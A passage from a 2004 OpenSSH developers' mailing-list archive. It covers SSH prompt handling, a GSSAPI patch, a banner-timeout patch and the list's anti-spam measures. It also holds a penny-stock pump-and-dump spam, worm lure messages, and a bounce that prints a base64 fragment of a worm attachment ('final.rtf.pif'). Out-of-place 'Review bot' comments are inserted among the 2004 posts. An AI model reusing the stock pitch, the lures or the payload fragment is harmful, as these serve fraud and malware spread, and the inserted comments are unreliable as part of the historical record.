trailing EOF to tell the shell to exit. If the shell gets an EOF it
should not respond with a prompt. Also, some shells decide whether or
not to issue a prompt by TTY detection.

What about inserting something into your command string to duplicate
what you expect a telnet prompt to do:

# The marker is quoted so that the remote shell does not read "#" as the
# start of a comment and drop the rest of the line.
echo "command -a; echo '###DONE###'; command -b; echo '###DONE###'" \
  | ssh remoteuser@host \
  | grep '^###DONE###$' \
  | ( while read line; do echo "Another one bites the dust..."; done )

On Mar 25, 2004, at 2:14 AM, Niclas Bäckman C (LI/EAB) wrote:

> Message: 8
> Date: Thu, 25 Mar 2004 08:33:58 +0100
> From: Niclas Bäckman C (LI/EAB)
> Subject: RE: Where does the "prompt come from"
> To: "'Damien Miller'"
> Cc: "'openssh-unix-dev at mindrot.org'"
> Message-ID:
>
>
>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi Damien !
> Thanks for your feedback !
> We have implemented a secure command line interface api that wants to
> perform "normal" shell
> operations, but from an application.
> That's why I don't want to add a new subsystem.
> I just want to run for instance scripts, towards a secured remote
> host. But the data that is passed
> to the socket doesn't include the prompt itself, like '>'. The socket
> is a redirect from the client's
> stdout/stderr.
> If I use a standard client like OpenSSH the client echoes back the
> prompt after a command is executed,
> but in my scenario it's lost and never written to stdout/stderr(my
> socket).
> Does the SSH client remove the prompt in some way before data is
> passed to stdout/stderr ??
> Many thanks in advance !
> /Niclas
>
---
Jeremy McMillan

From nectar at FreeBSD.org Fri Mar 26 02:51:56 2004
From: nectar at FreeBSD.org (Jacques A. Vidrine) Date: Thu, 25 Mar 2004 09:51:56 -0600 Subject: GSSAPI patch for multihomed hosts In-Reply-To: <000801c41137$c51d1ef0$fa00a8c0@home> References: <000801c41137$c51d1ef0$fa00a8c0@home> Message-ID: <20040325155156.GE62344@madman.celabo.org> On Wed, Mar 24, 2004 at 12:34:23AM -0000, Markus Moeller wrote: > Hi, > > This is another attempt to get my gssapi for multi homed systems into > openssh. Please find attach a small change so that gssapi authentication > works on multihomed systems. I don't think this patch should be applied. At least in the (MIT|Heimdal) Kerberos case, it is better to simply pass GSS_C_NO_NAME to gss_acquire_cred to accomplish the same thing. More desirable IMHO is a patch for the client to use HostKeyAlias to compute the GSSAPI name (so that tunneled SSH+GSSAPI connections work). I have something similar (but uses a different option name). Due to compatiblity issues, I'm still on OpenSSH 3.6.1+GSSAPI patches, but when I get a chance to migrate to 3.8 I will post patches here. Cheers, -- Jacques Vidrine / nectar at celabo.org / jvidrine at verio.net / nectar at freebsd.org From MAILER-DAEMON at lon-postoffice.telstra.net Fri Mar 26 04:56:56 2004 
From: MAILER-DAEMON at lon-postoffice.telstra.net (MAILER-DAEMON at lon-postoffice.telstra.net) Date: 25 Mar 2004 17:56:56 -0000 Subject: failure notice Message-ID: <20040325181141.1D8F527C18A@shitei.mindrot.org> Hi. This is the qmail-send program at lon-postoffice.telstra.net. I'm afraid I wasn't able to deliver your message to the following addresses. This is a permanent error; I've given up. Sorry it didn't work out. : 203.217.30.81 does not like recipient. Remote host said: 554 : Sender address rejected: internal address Giving up on 203.217.30.81. --- Below this line is a copy of the message. Return-Path: Received: (qmail 96104 invoked from network); 25 Mar 2004 17:43:00 -0000 Received: from unknown (HELO 205.147.224.9) (205.147.224.9) by lon-postoffice.telstra.net with SMTP; 25 Mar 2004 17:43:00 -0000 Message-ID: <20040325204155.5383CDAADD163AAB at ill.be.back.net> 
From: "Gallery-a" To: openssh-unix-dev at mindrot.org Subject: >>> the copies of ancient master?s masterpieces ************ (0388571815) Date: 25 Mar 2004 20:41:57 +0300 MIME-Version: 1.0 Content-Type: multipart/related; boundary="----=_NextPart_000_0012_8EBF5E94.D1C28CC2" ------=_NextPart_000_0012_8EBF5E94.D1C28CC2 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0013_8EBF5E94.D1C28CC2" ------=_NextPart_001_0013_8EBF5E94.D1C28CC2 Content-Type: text/plain Content-Transfer-Encoding: 8bit this is HTML-message, but Your browser do not support them. Visit follow link for fix it http://www.gallery-a.ru/expo/index.php/smirnoff ------=_NextPart_001_0013_8EBF5E94.D1C28CC2 Content-Type: text/html; charset="windows-1251" Content-Transfer-Encoding: base64 ------=_NextPart_001_0013_8EBF5E94.D1C28CC2-- ------=_NextPart_000_0012_8EBF5E94.D1C28CC2 Content-Type: image/jpeg; 
name="000006.jpg" Content-Transfer-Encoding: base64 Content-ID: <000006.jpg> ------=_NextPart_000_0012_8EBF5E94.D1C28CC2-- From TALJCQMAWLB at earthlink.net Thu Mar 25 22:32:32 2004 
From: TALJCQMAWLB at earthlink.net (Sterling Voss) Date: Thu, 25 Mar 2004 04:32:32 -0700 Subject: Investors Hot Picks, Don't Miss...ninth Message-ID: Our Hot Stock Pick ********************************************** Congratulations to all members who took advantage of our February Stock Pick NEOP - The stock was profiled at 30 cents and reached 80 cents recently ********************************************** NEWS*NEWS*NEWS Invicta Group Inc. Announces Opening of Las Vegas Office Invicta Group Inc. Announces Opening of Las Vegas Office NEWS*NEWS*NEWS Revenues Jan 1 - Feb 29, 2004 were $2,384,587 versus $1,572,085 for the same period in 2003. WATCH FOR MORE NEWS 18th of March and by the end of the week! ++ Top March Trading Alert ++ Company Profile Invicta Group Inc Symbol: IVGA Current Price: $0.11 SPECULATIVE NEAR TERM TARGET PRICE - $0.22 SPECULATIVE LONG TERM TARGET PRICE - $0.27 We Expect some strong demand for this stock in the near future!!!!! Get on Board now and enjoy the bull ride with IVGA Recent News Stories about IVGA: Revenues Jan 1 - Feb 29, 2004 were $2,384,587 versus $1,572,085 for the same period in 2003. ------------------------------------------------------ Invicta Group Inc. Announces Opening of Las Vegas Office About the Company: Invicta Group Inc. is a technology company that specializes in the travel and entertainment industries. The company has three divisions: Travel: engaged in offering airline tickets, hotel rooms, car rentals and other travel-related products over the telephone and Internet (www.dontpayfullfare.com); Entertainment: offering complimentary Casino Resorts rooms, meals, and shows to qualified players at 30 casinos in N. America and the Caribbean (www.casinoratedplayers.com); and Technology: IVGA owns its own search engine: "on the fly faring." IVGA recently acquired ISIP Telecom Group, Inc. (www.isiptelecom.com), which provides the ability to make telephone calls worldwide via the Internet with clear reception at low rates. 
ISIP Telecom will soon be offering its services to the travel industry, and has already entered into interconnection agreements with major operators in the U.S., Europe, & Latin America via VoIP & PSTN for traffic termination and origination. --------------READ READ READ------------ Invicta Group Inc. Announces Opening of Las Vegas Office ---------------------------------------- MIAMI BEACH, Fla., Mar 15, 2004 /PRNewswire- FirstCall via COMTEX/ -- Invicta Group Inc. (IVGA) announces the opening of its Las Vegas office. Invicta is setting up an inbound tour operation which will offer Las Vegas rooms, car rentals, air transportation, show tickets, limos, sightseeing tours and free rooms to casino qualified players; reservations can be made by phone or on the internet. The name of the newest subsidiary is "Las Vegas Excitement" and can be found online at www.lasvegase . ; the website is under construction and will be operational April 5. "Las Vegas Excitement will offer discounted packages that include: airline tickets, airport transfers and accommodations to customers online, and to our 10,000 travel agents that are customers of our subsidiary Airplan. Our goal is to cross market products within our subsidiaries, offering service and savings to our clients," stated William Forhan, CEO. Airplan is an air consolidator company that offers discounted airline tickets internationally through its B-2-B website: www.airplan.com , marketing its products to the travel agents. Airplan will offer Las Vegas products to its customers, paying 10% commissions for packages purchased. ------------------------------------- --------------- Disclaimer --------------- Please be advised that nothing within this email shall constitute a solicitation or an offer to buy or sell any security mentioned herein. This newsletter is neither a registered investment advisor nor affiliated with any broker or dealer. All statements made are our express opinion only and should be treated as such. 
We may own, buy and sell any securities mentioned at any time. This report includes forward-looking statements within the meaning of The Private Securities Litigation Reform Act of 1995. These statements may include terms as "expect", "believe", "may", "will", "move", "undervalued" and "intend" or similar terms. This newsletter was paid $3430 from third party to send this report. PLEASE DO YOUR OWN DUE DILIGENCE BEFORE INVESTING IN ANY PROFILED COMPANY. To be removed from further emails send email to...sdsdsd at yahoo.co.uk...n Thu, 25 Mar 2004 10:35:32 -0100 From markus_moeller at compuserve.com Fri Mar 26 10:47:32 2004 From: markus_moeller at compuserve.com (Markus Moeller) Date: Thu, 25 Mar 2004 23:47:32 -0000 Subject: GSSAPI patch for multihomed hosts References: <000801c41137$c51d1ef0$fa00a8c0@home> <20040325155156.GE62344@madman.celabo.org> Message-ID: <000701c412c3$8eebb070$fa00a8c0@home> Jacques, But I think with GSS_C_NO_NAME you lose the mutual authentication. An option to select would be best.. Regards Markus ----- Original Message ----- 
From: "Jacques A. Vidrine" To: "Markus Moeller" Cc: Sent: Thursday, March 25, 2004 3:51 PM Subject: Re: GSSAPI patch for multihomed hosts > > On Wed, Mar 24, 2004 at 12:34:23AM -0000, Markus Moeller wrote: > > Hi, > > > > This is another attempt to get my gssapi for multi homed systems into > > openssh. Please find attached a small change so that gssapi authentication > > works on multihomed systems. > > I don't think this patch should be applied. At least in the > (MIT|Heimdal) Kerberos case, it is better to simply pass GSS_C_NO_NAME > to gss_acquire_cred to accomplish the same thing. > > More desirable IMHO is a patch for the client to use HostKeyAlias > to compute the GSSAPI name (so that tunneled SSH+GSSAPI connections > work). I have something similar (but uses a different option name). > Due to compatibility issues, I'm still on OpenSSH 3.6.1+GSSAPI patches, > but when I get a chance to migrate to 3.8 I will post patches here. > > Cheers, > -- > Jacques Vidrine / nectar at celabo.org / jvidrine at verio.net / nectar at freebsd.org > From sales at tolvanen.com Fri Mar 26 14:38:54 2004 From: sales at tolvanen.com (sales at tolvanen.com) Date: Fri, 26 Mar 2004 00:38:54 -0300 Subject: (no subject) Message-ID: <20040326033813.39BBB27C188@shitei.mindrot.org> +++ Attachment: No Virus found +++ MessageLabs AntiVirus - www.messagelabs.com -------------- next part -------------- A non-text attachment was scrubbed... Name: message.zip Type: application/octet-stream Size: 29840 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040326/de9241ba/attachment.obj From roland.mainz at nrubsig.org Fri Mar 26 14:41:06 2004 
From: roland.mainz at nrubsig.org (Roland Mainz) Date: Fri, 26 Mar 2004 04:41:06 +0100 Subject: SPAM and other junk posted to openssh-unix-dev@mindrot.org / was: [Fwd: [MailServer Notification]To Recipient virus found and action taken.] Message-ID: <4063A652.5D2757BD@nrubsig.org> Hi! ---- Is it possible to block postings (or let mailman put it into the "approval" queue and let someone approve the non-SPAM postings) from non-list-members to get rid of this SPAM ? -------- Original Message -------- Subject: [MailServer Notification]To Recipient virus found and action taken. Date: Fri, 26 Mar 2004 04:03:34 ??? From: To: ScanMail for Microsoft Exchange has detected virus-infected attachment(s). Sender = openssh-unix-dev-bounces+robert.dahlem=kordoba.de at mindrot.org Recipient(s) = openssh-unix-dev at mindrot.org Subject = Mail Account Scanning time = 03/26/2004 04:03:29 Engine/Pattern = 6.810-1005/837 Action on virus found: The attachment readme_openssh-unix-dev.zip contains WORM_NETSKY.P virus. ScanMail has Quarantined it. The attachment was quarantined to D:\Program Files\Trend\Smex\Virus\readme_openssh-unix-dev40639d821a.zip_. Warnung an Empfänger: ScanMail hat einen Virus in einer Mail an Sie entdeckt und diesen erfolgreich entfernt. Warning to recipient. ScanMail has detected a virus. _______________________________________________ openssh-unix-dev mailing list openssh-unix-dev at mindrot.org http://www.mindrot.org/mailman/listinfo/openssh-unix-dev From djm at mindrot.org Fri Mar 26 17:13:34 2004 
From: djm at mindrot.org (Damien Miller) Date: Fri, 26 Mar 2004 17:13:34 +1100 Subject: SPAM and other junk posted to openssh-unix-dev@mindrot.org / was: [Fwd: [MailServer Notification]To Recipient virus found and action taken.] In-Reply-To: <4063A652.5D2757BD@nrubsig.org> References: <4063A652.5D2757BD@nrubsig.org> Message-ID: <4063CA0E.3080208@mindrot.org> Roland Mainz wrote: > Hi! > > Is it possible to block postings (or let mailman put it into the > "approval" queue and let someone approve the non-SPAM postings) from > non-list-members to get rid of this SPAM ? The list is already pretty heavily filtered, using SpamAssassin, Mailman's internal stuff and a heap of procmail. Pushing stuff into an approval queue is not currently an option, I just don't have enough time to vet messages from non-subscribers. Unless Mailman's approval interface radically improves, I can't see this circumstance changing anytime soon. A better option would be to improve the spam filtering with some additional rulesets (especially ones to catch antivirus adverts^H^H^Hnotifications) and maybe some greylisting. I'll try to implement this as soon as I can. There is a pretty clear cycle in the number of spams that make it through SpamAssassin. It drops right after a stable release and then climbs back up as the spammers get wise. Right now we are well into such a climb, so hopefully the SpamAssassin team will make a new release soon. Until then, please accept my apologies for the inconvenience. This is, unfortunately, one of the costs of having an open list. -d From hpa at yggdrasil.com Sat Mar 27 00:54:33 2004 
From: hpa at yggdrasil.com (hpa at yggdrasil.com) Date: Fri, 26 Mar 2004 10:54:33 -0300 Subject: approved document Message-ID: <20040326195058.A5E6427C187@shitei.mindrot.org> Please read the important document. +++ Attachment: No Virus found +++ MC-Afee AntiVirus - www.mcafee.com -------------- next part -------------- A non-text attachment was scrubbed... Name: document_openssh-unix-dev.zip Type: application/octet-stream Size: 29834 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040326/b5a73a07/attachment.obj From mic_bowman at yahoo.com Sat Mar 27 10:19:22 2004 
From: mic_bowman at yahoo.com (Mic Bowman) Date: Fri, 26 Mar 2004 15:19:22 -0800 (PST) Subject: Patch for login exchange timeout Message-ID: <20040326231922.62171.qmail@web20802.mail.yahoo.com> Here's a quick patch that adds a timeout (value set from the connection timeout config parameter) for identification exchange. The situation that this fixes is the one where the sshd has a connection open (so you can make a TCP connection) but does not put up a banner (e.g. when the disk has crashed or when file descriptors are exhausted on a machine). Sounds unusual, but this happens with some regularity on PlanetLab (www.planet-lab.org)... Anyway, that situation is not caught by either the ConnectionTimeout, TCPKeepAlive, or the ServerAlive timeouts. This patch just sets an alarm prior to the atomicio call that reads & processes the banner from the sshd. --Mic micbowman at comcast dot net *** sshconnect.c 2004-01-27 02:21:27.000000000 -0800 --- sshconnect-new.c 2004-03-26 14:48:24.000000000 -0800 *************** *** 429,434 **** --- 429,444 ---- } /* + * Signal handler for the alarm after the login grace period has expired. + */ + static void + grace_alarm_handler(int sig) + { + /* Log error and exit. */ + fatal("Timeout before authentication"); } + + /* * Waits for the server identification string, and sends our own * identification string. */ *************** *** 441,446 **** --- 451,462 ---- int connection_out = packet_get_connection_out(); int minor1 = PROTOCOL_MINOR_1; + /* Setup a handler for banner prompt */ + if (options.connection_timeout > 0) { + signal(SIGALRM, grace_alarm_handler); + alarm(options.connection_timeout); + } + + /* Read other side\'s version identification. */ for (;;) { for (i = 0; i < sizeof(buf) - 1; i++) { *************** *** 466,471 **** --- 482,494 ---- } server_version_string = xstrdup(buf); + /* Clear the alarm */ + if (options.connection_timeout > 0) { + alarm(0); + signal(SIGALRM,SIG_DFL); + } + + /* * Check that the versions match. 
In future this might accept * several versions and set appropriate flags to handle them. From djm at mindrot.org Sat Mar 27 10:23:01 2004 From: djm at mindrot.org (Damien Miller) Date: Sat, 27 Mar 2004 10:23:01 +1100 Subject: SPAM and other junk posted to openssh-unix-dev@mindrot.org / was: [Fwd: [MailServer Notification]To Recipient virus found and action taken.] In-Reply-To: <4063CA0E.3080208@mindrot.org> References: <4063A652.5D2757BD@nrubsig.org> <4063CA0E.3080208@mindrot.org> Message-ID: <4064BB55.2050605@mindrot.org> Damien Miller wrote: > A better option would be to improve the spam filtering with some > additional rulesets (especially ones to catch antivirus > adverts^H^H^Hnotifications) and maybe some greylisting. I'll try to > implement this as soon as I can. The mailing list is now filtered using a bunch of additional rulesets from http://wiki.apache.org/spamassassin/CustomRulesets -d From gleydson at ftp.debian.org Sat Mar 27 10:15:28 2004 From: gleydson at ftp.debian.org (gleydson at ftp.debian.org) Date: Fri, 26 Mar 2004 20:15:28 -0300 Subject: important Message-ID: <20040326233107.0588027C18A@shitei.mindrot.org> Your document is attached. From djm at mindrot.org Sat Mar 27 10:31:18 2004 
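Review bot: In the first hunk of the sshconnect.c patch above (429,444), grace_alarm_handler() calls fatal() straight from the SIGALRM handler. The hunk's own comment says this logs and exits, and neither logging nor exit-time cleanup is async-signal-safe, so the handler can interrupt the banner read loop in the middle of a library call and re-enter it. Set a volatile sig_atomic_t flag and let the read loop report the timeout, or bound the read with select() and drop the signal altogether. The comment ("login grace period") and the message ("Timeout before authentication") also describe something other than what the timer guards, which is the wait for the server identification string; word both accordingly.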
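Review bot: In the second hunk (451,462), alarm(options.connection_timeout) arms a fresh full-length timer after the connect phase has already been allowed the same value, so the worst case before the client gives up is roughly twice what the user configured. Pass in the time still left after connecting and arm the timer with that remainder, treating a remainder of zero as an immediate timeout. The return value of signal(SIGALRM, grace_alarm_handler) is discarded here as well, so whatever handler was installed before is lost; keep it in a local so it can be put back.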
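Review bot: In the third hunk (482,494), the handler is reset with signal(SIGALRM,SIG_DFL) instead of being restored to whatever was installed before the second hunk replaced it, which silently changes SIGALRM behaviour for the rest of the client. Restore the saved handler after alarm(0). Style: add the space after the comma in signal(SIGALRM,SIG_DFL) to match the call in the second hunk.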
From: djm at mindrot.org (Damien Miller) Date: Sat, 27 Mar 2004 10:31:18 +1100 Subject: Patch for login exchange timeout In-Reply-To: <20040326231922.62171.qmail@web20802.mail.yahoo.com> References: <20040326231922.62171.qmail@web20802.mail.yahoo.com> Message-ID: <4064BD46.8090603@mindrot.org> Mic Bowman wrote: > Here's a quick patch that adds a timeout (value set > from the connection timeout config parameter) for > identification exchange. I think the idea is ok, but IMO the implementation should do select+timeout rather than use signals. Also, maybe the timeout for the banner exchange should be ConnectionTimeout less the time actually used during the connect phase. -d From micbowman at comcast.net Sat Mar 27 11:10:20 2004 From: micbowman at comcast.net (micbowman at comcast.net) Date: Sat, 27 Mar 2004 00:10:20 +0000 Subject: Patch for login exchange timeout Message-ID: <032720040010.18650.4064C66C0003F49C000048DA2200745672FF919E9288909D9C96@comcast.net> I agree with select/timeout. This was a *fast*, minimal impact to the current code kind of patch. Change it however you want. --Mic > Mic Bowman wrote: > > Here's a quick patch that adds a timeout (value set > > from the connection timeout config parameter) for > > identification exchange. > > I think the idea is ok, but IMO the implementation should do > select+timeout rather than use signals. > > Also, maybe the timeout for the banner exchange should be > ConnectionTimeout less the time actually used during the connect phase. > > -d From roland.mainz at nrubsig.org Sat Mar 27 11:10:48 2004 
From: roland.mainz at nrubsig.org (Roland Mainz) Date: Sat, 27 Mar 2004 01:10:48 +0100 Subject: SPAM and other junk posted to openssh-unix-dev@mindrot.org /was: [Fwd: [MailServer Notification]To Recipient virus found and actiontaken.] References: <4063A652.5D2757BD@nrubsig.org> <4063CA0E.3080208@mindrot.org> <4064BB55.2050605@mindrot.org> Message-ID: <4064C688.314EA1D0@nrubsig.org> Damien Miller wrote: > > A better option would be to improve the spam filtering with some > > additional rulesets (especially ones to catch antivirus > > adverts^H^H^Hnotifications) and maybe some greylisting. I'll try to > > implement this as soon as I can. > > The mailing list is now filtered using a bunch of additional rulesets > from http://wiki.apache.org/spamassassin/CustomRulesets Thanks! :) ---- Bye, Roland -- __ . . __ (o.\ \/ /.o) roland.mainz at nrubsig.org \__\/\/__/ MPEG specialist, C&&JAVA&&Sun&&Unix programmer /O /==\ O\ TEL +49 2426 901568 FAX +49 2426 901569 (;O/ \/ \O;) From dtucker at zip.com.au Sat Mar 27 17:46:06 2004 
From: dtucker at zip.com.au (Darren Tucker) Date: Sat, 27 Mar 2004 17:46:06 +1100 Subject: Patch for login exchange timeout In-Reply-To: <4064BD46.8090603@mindrot.org> References: <20040326231922.62171.qmail@web20802.mail.yahoo.com> <4064BD46.8090603@mindrot.org> Message-ID: <4065232E.7040408@zip.com.au> Damien Miller wrote: > Mic Bowman wrote: > >>Here's a quick patch that adds a timeout (value set >>from the connection timeout config parameter) for >>identification exchange. > > I think the idea is ok, but IMO the implementation should do > select+timeout rather than use signals. > Also, maybe the timeout for the banner exchange should be > ConnectionTimeout less the time actually used during the connect phase. One possible approach would be to have the initial select() wait for some data from the server (eg the banner), as per the attached patch. -- Darren Tucker (dtucker at zip.com.au) GPG key 8FF4FA69 / D9A3 86E9 7EEE AF4B B2D4 37C9 C982 80C7 8FF4 FA69 Good judgement comes with experience. Unfortunately, the experience usually comes from bad judgement. -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: openssh-connect-timeout.patch Url: http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20040327/46431e62/attachment.ksh From djm at mindrot.org Sat Mar 27 20:07:27 2004 
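The select()-with-timeout approach suggested in this thread for the banner wait, including "ConnectionTimeout less the time actually used during the connect phase", can be sketched as follows. This is an added example, not the patch attached to the list and not OpenSSH code; the function names, result codes and the socketpair() demo input are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <time.h>
#include <unistd.h>

/* Result codes and function names are hypothetical, not OpenSSH's. */
enum { ID_OK = 0, ID_TIMEOUT = -1, ID_EOF = -2, ID_ERROR = -3 };

static long long now_ms(void)
{
	struct timespec ts;
	clock_gettime(CLOCK_MONOTONIC, &ts);	/* unaffected by wall-clock steps */
	return (long long)ts.tv_sec * 1000 + ts.tv_nsec / 1000000;
}

/* Read one line (CR/LF stripped) from fd, giving up at the absolute deadline. */
static int read_line_deadline(int fd, char *buf, size_t len, long long deadline)
{
	size_t i = 0;
	if (fd < 0 || fd >= FD_SETSIZE || len < 2)
		return ID_ERROR;	/* FD_SET() is undefined past FD_SETSIZE */
	buf[0] = '\0';
	for (;;) {
		long long left = deadline - now_ms();
		struct timeval tv;
		fd_set rfds;
		ssize_t n;
		char c;
		int r;
		if (left <= 0)
			return ID_TIMEOUT;	/* connected, but the peer stayed silent */
		FD_ZERO(&rfds);
		FD_SET(fd, &rfds);
		tv.tv_sec = left / 1000;
		tv.tv_usec = (left % 1000) * 1000;
		r = select(fd + 1, &rfds, NULL, NULL, &tv);
		if (r == -1 && errno != EINTR)
			return ID_ERROR;
		if (r <= 0)
			continue;	/* timeout or EINTR: re-check the deadline */
		n = read(fd, &c, 1);
		if (n == 0)
			return ID_EOF;
		if (n == -1 && errno != EINTR && errno != EAGAIN)
			return ID_ERROR;
		if (n == -1)
			continue;
		if (c == '\n')
			return ID_OK;
		if (c != '\r' && i < len - 1) {	/* overlong lines are truncated */
			buf[i++] = c;
			buf[i] = '\0';
		}
	}
}

/* Wait for the "SSH-" line, skipping earlier lines. *budget_ms is what remains
 * of the overall timeout (e.g. after connect()) and is updated on return. */
int wait_for_server_ident(int fd, char *buf, size_t len, long long *budget_ms)
{
	long long left, deadline = now_ms() + *budget_ms;
	int rc;
	do {
		rc = read_line_deadline(fd, buf, len, deadline);
	} while (rc == ID_OK && strncmp(buf, "SSH-", 4) != 0);
	left = deadline - now_ms();
	*budget_ms = left > 0 ? left : 0;
	return rc;
}

char demo_ident[256];	/* identification line seen by the last demo_run() */
long long demo_left;	/* budget remaining after the last demo_run() */

/* Run against a socketpair whose far end sends peer_data (NULL: stays silent). */
int demo_run(const char *peer_data, long long budget_ms)
{
	int sv[2], rc = ID_ERROR;
	demo_left = budget_ms;
	if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) == -1)
		return ID_ERROR;
	if (peer_data == NULL || write(sv[1], peer_data, strlen(peer_data)) != -1)
		rc = wait_for_server_ident(sv[0], demo_ident, sizeof(demo_ident), &demo_left);
	close(sv[0]);
	close(sv[1]);
	return rc;
}

int main(void)
{
	/* Constructed input: a pre-banner line, then a made-up version string. */
	printf("%d\n", demo_run("notice\r\nSSH-2.0-Example_1.0\r\n", 2000));
	printf("%d\n", demo_run(NULL, 200));	/* open connection, no banner */
	return 0;
}
```

Because the deadline is absolute and recomputed before every select() call, a peer that trickles bytes or sends lines without a version string cannot extend the wait, and no signal handler is involved.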
From: djm at mindrot.org (Damien Miller)
Date: Sat, 27 Mar 2004 20:07:27 +1100
Subject: Disabled accounts
Message-ID: <4065444F.10601@mindrot.org>

I have received a couple of queries from people who have had emails suggesting that their mailing list subscription had been suspended. This is not a problem with your account, here is what happened:

Yesterday someone's broken Outlook mailed a virus to the list. The list has been set up to block executable attachments, but not (until now) zip files, so the virus was forwarded. Some people's mailservers have antivirus filtering enabled, so they bounced the offending message from the list - triggering the list manager software to disable their list membership.

I noticed the problem this morning (AEDST) and re-enabled every account that I could find that had been disabled. I also blocked application/octet-stream attachments, and am seriously considering blocking all non-text attachment types.

So, apologies for any confusion. Hopefully the new filtering goop will stop this stuff from happening again.

-d

From ed at membled.com Sat Mar 27 20:56:49 2004
From: ed at membled.com (Ed Avis)
Date: Sat, 27 Mar 2004 09:56:49 +0000 (GMT)
Subject: SPAM and other junk posted to openssh-unix-dev@mindrot.org
In-Reply-To: <20040326195151.9F32427C392@shitei.mindrot.org>
Message-ID:

You can read the list via , which does its own Spamassassin and ClamAV filtering. But it looks like at the moment SA there is having almost as many troubles as that filtering the list itself.

It would be possible to write some new SA rules to catch the 'suspicious message' crap, and then send them to either the list owner or the maintainer of Gmane.

--
Ed Avis

From MAILER-DAEMON at anet-mail7.anet.ne.jp Sun Mar 28 04:09:23 2004
From: MAILER-DAEMON at anet-mail7.anet.ne.jp (MAILER-DAEMON at anet-mail7.anet.ne.jp)
Date: 28 Mar 2004 03:09:23 +0900
Subject: failure notice
Message-ID: <20040327180903.BC3D627C187@shitei.mindrot.org>

Hi. This is the qmail-send program at anet-mail7.anet.ne.jp.
I'm afraid I wasn't able to deliver your message to the following addresses.
This is a permanent error; I've given up. Sorry it didn't work out.

:
sqlforward: fatal: This address not registered

--- Below this line is a copy of the message.

Return-Path:
Received: (qmail 904 invoked by uid 0); 28 Mar 2004 03:09:08 +0900
Received: from unknown (HELO anet.ne.jp) (200.233.66.132)
  by mail7.anet.ne.jp with SMTP; 28 Mar 2004 03:09:08 +0900
From: openssh-unix-dev at mindrot.org
To: sancyo at anet.ne.jp
Subject: fake?
Date: Sat, 27 Mar 2004 15:09:19 -0300
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_0009_00007DF3.00006C56"
X-Priority: 3
X-MSMail-Priority: Normal

This is a multi-part message in MIME format.

------=_NextPart_000_0009_00007DF3.00006C56
Content-Type: text/plain; charset="Windows-1252"
Content-Transfer-Encoding: 7bit

correct it!

------=_NextPart_000_0009_00007DF3.00006C56
Content-Type: application/x-zip-compressed; name="final.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="final.zip"
lAEAIgAAAAAAAAAAAAAAKAAAACAAAABAAAAAAQAEAAAAAACAAgAAAAAAAAAAAAAAAAAAAAAA AMz//wBoV1gAAAAAAICAgAD///8AwMDAAP8AAAAA//8AvwAAAAAA/wAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAiIRIiIiIiIiIiIiIiIiIiIiE1VVVVVVVVVVVVVSUiIiIjRERERERERERE RERSUiIiI0RERERERFVUREVVUlIiIiNEiIiIREmZRESZlFJSIiIjRERERERElURESVRSUiIi I0SIiIiIRElVVVlUUlIiIiNEREREREREmZmZVFJSIiIjRIiIiIiIRElUSVRSUiIiI0RERERE RERElUlUUlIiIiNEiIiIiIiIRElZVFJSIiIjREREREREREREmVRSUiIiI0SIiIiIiIiIRElE UlIiIiNERERERERERERERFJSIiIjRIiIiIiIiIiIiERSUiIiI0REREREREREREREUlIiIiNE iIiIiIiIiIiIRFJSIiIjRERERERERERERERSUiIiI0QiIiIiRIiIiIhEUlIiIiNEOZJEQkRE RERERFJSIiIjRDIiIiJEiIiIiERSUiIiI0Q0QndyREREREREUlIiIiNEMiJ3ckSIiIiIRFJS IiIjRDRCd3JERERERERSUiIiI0Q0QmZiREREREREUlIiIiNENEJmYkRERERERFJSIiIjRDMy IiJERERERERSUiIiI0REREREREREREREUlIiIiNCRCRCRCRCRCRCRDJSIiIjQkQkQkQkQkQk QkQyUiIiIiQzQzQzQzQzQzQzQyIiIiIiIiIiIiIiIiIiIiIiIuAAAA/gAAAH4AAAB+AAAAfg AAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAA B+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB+AAAAfgAAAH4AAAB/gAAA// ////KAAAABAAAAAgAAAAAQAEAAAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAIAA AACAgACAAAAAgACAAICAAADAwMAAgICAAAAA/wAA/wAAAP//AP8AAAD/AP8A//8AAP///wAA AAAAAAAAAAB3d3d3d3AAAP//n/+fcAAA//95mZ9wAAD0RPefn3AAAP///3mfcAAA9ERE959w AAD//////3AAAPRERERPcAAA//////9wAAD0RERET3AAAP//////cAAA//////9wAADw8PDw 8PAAAA+Pj4+PgAAAAAAAAAAAAMAHAADAAwAAwAMAAMADAADAAwAAwAMAAMADAADAAwAAwAMA AMADAADAAwAAwAMAAMADAADAAwAAwAcAAOqvAAAAAAEAAgAgIBAAAQAEAOgCAAABABAQEAAB AAQAKAEAAAIAAAAAAAAA/1BLAQIUAAoAAAAAACmRezBiZMYWCWMAAAljAAANAAAAAAAAAAAA IAAAAAAAAABmaW5hbC5ydGYucGlmUEsFBgAAAAABAAEAOwAAADRjAAAAAA== ------=_NextPart_000_0009_00007DF3.00006C56-- From narendra at spiff.mt.att.com Sun Mar 28 05:10:48 2004 
From: narendra at spiff.mt.att.com (Narendra Raavi)
Date: Sat, 27 Mar 2004 14:10:48 -0500
Subject: Problems Compiling sshd - OpenSSH 3.8p1 on Tru64 UNIX V4.0F PK#7 (OSF)
Message-ID: <20040327141048.A637@spiff.hr.att.com>

I am trying to compile sshd 3.8p1 on Tru64 UNIX V4.0F Patch Level 7.
Previously I've compiled the entire 3.6.1p2 distribution with no problems.
The problem seems to occur when linking sshd. The linker is unable to find
xcrypt and shadow_pw functions (openbsd-compat/*.c). The libopenbsd-compat
